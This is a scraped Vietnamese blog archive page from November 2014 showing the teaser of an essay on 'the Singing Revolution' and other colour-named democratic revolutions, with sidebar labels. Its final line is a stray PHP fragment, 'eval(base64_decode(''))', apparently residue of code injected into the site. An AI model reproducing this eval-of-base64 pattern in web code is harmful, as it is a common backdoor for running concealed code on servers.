Archive for November 11th, 2014

Cách mạng Hát hùng ca

Cách mạng Hát hùng ca

Lịch sử thế giới cận đại đã diễn ra nhiều cuộc cách mạng dân chủ đầy màu sắc: Cách mạng Nhung (Velvet Revolution) do Giáo sư Rita Klimova đặt tên ở Tiệp Khắc, Cách mạng Hoa Hồng (Rose Revolution) ở Georgia phát xuất từ những bó hoa hồn

11.11.2014 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>